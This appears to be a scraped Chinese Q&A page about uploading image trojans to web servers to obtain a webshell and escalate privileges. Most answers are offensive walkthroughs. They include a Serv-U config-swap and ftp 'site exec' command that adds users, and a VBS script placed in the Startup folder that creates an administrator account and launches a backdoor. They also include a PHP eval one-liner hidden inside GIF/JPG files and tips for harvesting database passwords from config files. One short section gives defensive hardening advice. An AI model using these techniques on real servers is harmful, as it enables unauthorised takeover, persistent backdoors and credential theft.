當前位置:首頁 » 文件傳輸 » 上傳圖片馬拿shell
擴展閱讀
webinf下怎麼引入js 2023-08-31 21:54:13
堡壘機怎麼打開web 2023-08-31 21:54:11

上傳圖片馬拿shell

發布時間: 2022-12-06 05:17:50

Ⅰ 如果我可以創建一個類似/aaaa.asp 這樣的目錄,下面是不是傳上我的圖片馬就可以拿shell呀

這個是IIS6.0裡面的一個asp漏洞,也就是目錄解析漏洞。現在有很多補丁可以用了。基本上沒有這種漏洞了。出來菜鳥的伺服器管理員!

Ⅱ 已經傳上大馬,怎麼拿shell,直至提權

第一
如果伺服器上有裝了pcanywhere服務端,管理員為了管理方便
也給了我們方便,到系統盤的Documents and Settings/All Us
ers/Application Data/Symantec/pcAnywhere/中下載*.cif本地
破解就使用pcanywhere連接就ok了

第二
有很多小黑問我這么把webshell的iis user許可權提升
一般伺服器的管理都是本機設計完畢然後上傳到空間里,
那麼就會用到ftp,伺服器使用最多的就是servu
那麼我們就利用servu來提升許可權
通過servu提升許可權需要servu安裝目錄可寫~

好開始把,首先通過webshell訪問servu安裝文件夾下的ServUDaemon.ini把他下載
下來,然後在本機上安裝一個servu把ServUDaemon.ini放到本地安裝文件夾下覆蓋,
啟動servu添加了一個用戶,設置為系統管理員,目錄C:\,具有可執行許可權
然後去servu安裝目錄里把ServUDaemon.ini更換伺服器上的。
用我新建的用戶和密碼連接~
好的,還是連上了

ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id //剛才添加的用戶
331 User name okay, please send complete E-mail address as password.
Password:password //密碼
230 User logged in, proceed.
ftp> cd winnt //進入win2k的winnt目錄
250 Directory changed to /WINNT
ftp>cd system32 //進入system32目錄
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user rover rover1234 /add //利用系統的net.exe

文件加用戶。
如果提示沒有許可權,那我們就
把後門(server.exe) 傳他system32目錄
然後寫一個VBs教本

set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c net user user pass /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0)
b=wshshell.run ("cmd.exe /c server.exe",0)

存為xx.vbe
這個教本的作用是建立user用戶密碼為pass
並且提升為管理員
然後執行system32目錄下的server.exe
把這個教本傳他 C:\Documents and Settings\All Users\「開始」菜單\程序\啟動
目錄
這樣管理員只要一登陸就會執行那個教本.
接下來就是等了.等他登陸.

第三

就是先檢查有什麼系統服務,或者隨系統啟動自動啟動的程序和管理員經常使用的軟體, 比如諾頓,VAdministrator,金山,瑞星,WinRAR甚至QQ之類的,是否可以寫,如果可以就修改其程序, 綁定一個批處理或者VBS,然後還是等待伺服器重啟。

第四

查找conn和config ,pass這類型的文件看能否得到sa或者mysql的相關密碼,可能會有所
收獲等等。

第五

使用Flashfxp也能提升許可權,但是成功率就看你自己的運氣了
首先找到FlashFXP文件夾,打開(編輯)Sites. dat,這個文件這是什麼東西密碼和用戶名,
而且密碼是

Ⅲ 如何防止上傳圖片木馬

目前無組件上傳類都存在此類漏洞——即黑客利用「抓包嗅探偽造IP包,突破伺服器端對上傳文件名、路徑的判斷,巧妙上傳ASP、ASA、CGI、CDX、CER、ASPX類型的木馬。

防範方法:刪除後台管理中的恢復/備份資料庫功能。

檢查您的網頁是否有備份數據的功能..或者能把文件重新命名的功能.
數據備份建議使用絕對路徑.

黑客應該是先把網馬shell 改成jpg 然後上傳後.利用備份功能...改為asp.

通用防範上傳漏洞入侵秘笈:將伺服器端的組件改名

將FileSystemObject組件、WScript.Shell組件、Shell.Application組件改名,然後禁用Cmd.exe,就可以預防漏洞上傳攻擊。

Ⅳ 後台能上傳圖片,怎麼拿shell

1、文件頭+GIF89a法。(php)//這個很好理解,直接在php馬最前面寫入gif89a,然後上傳dama.php
2、使用edjpgcom工具注入代碼。(php)//edjpgcom修改,加入php一句話保存為dama.php
3、cmd命令下 圖片.GIF+shell.php webshell.php (php) //估計和1是同樣的原理,欺騙上傳webshell.php
4、C32asm打開圖片在文件末尾空一格加入代碼<?php eval($_POST[cmd])?> 。(php)//填充php一句話然後上傳。

Ⅳ 簡約論壇v3.0怎麼拿shell

拿WebShell有很多種方法,先找上傳圖片的地方,如果能上傳asp格式的就直接拿到Shell了,這種情況比較少了,如果有資料庫備份,直接把jpg格式的木馬備份成asp的,如果沒備份的話抓包上傳或nc提交,一般抓包能找到上傳漏洞,然後用工具例如明小子上傳,另外抓包有可能查看到網站系統用的ewebeditor的話,可以進入在線編輯器,添加asp格式,直接上傳asp馬,還有可以利用gif頭文件圖片,有備份沒上傳的話可以向資料庫中插入一句話木馬備份成asp的,還有利用win2003解析漏洞de方法,基本的就是這些了,思路非常多,重要的是有個靈活的頭腦~~

Ⅵ 我上傳了jpg木馬,訪問時被解析了,怎麼辦

1,是伺服器的藍本裡面出現了圖片木馬么
2,這個別留著,及時的查殺了吧
3,裝個電腦管家,用病毒查殺,找出圖片病毒全部刪除了